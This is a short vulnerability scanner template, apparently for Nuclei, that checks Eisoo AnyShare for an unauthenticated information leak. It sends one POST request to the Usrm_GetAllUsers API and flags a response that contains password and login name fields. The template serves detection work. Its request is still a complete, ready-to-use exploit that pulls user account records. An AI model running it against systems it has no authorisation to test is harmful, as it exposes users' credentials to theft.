id: anyshare-usrm-getallusers-info-leak

info:
  name: AnyShare Usrm_GetAllUsers - Information Leak
  author: qwtd
  severity: high
  description: AnyShare Usrm_GetAllUsers is vulnerable to information leak.
  tags: Eisoo-AnyShare

http:
  - raw:
      - |
        POST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

        [1,100]

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'password'
          - 'loginName'
          - 'directDeptInfo'
        condition: and

      - type: status
        status:
          - 200
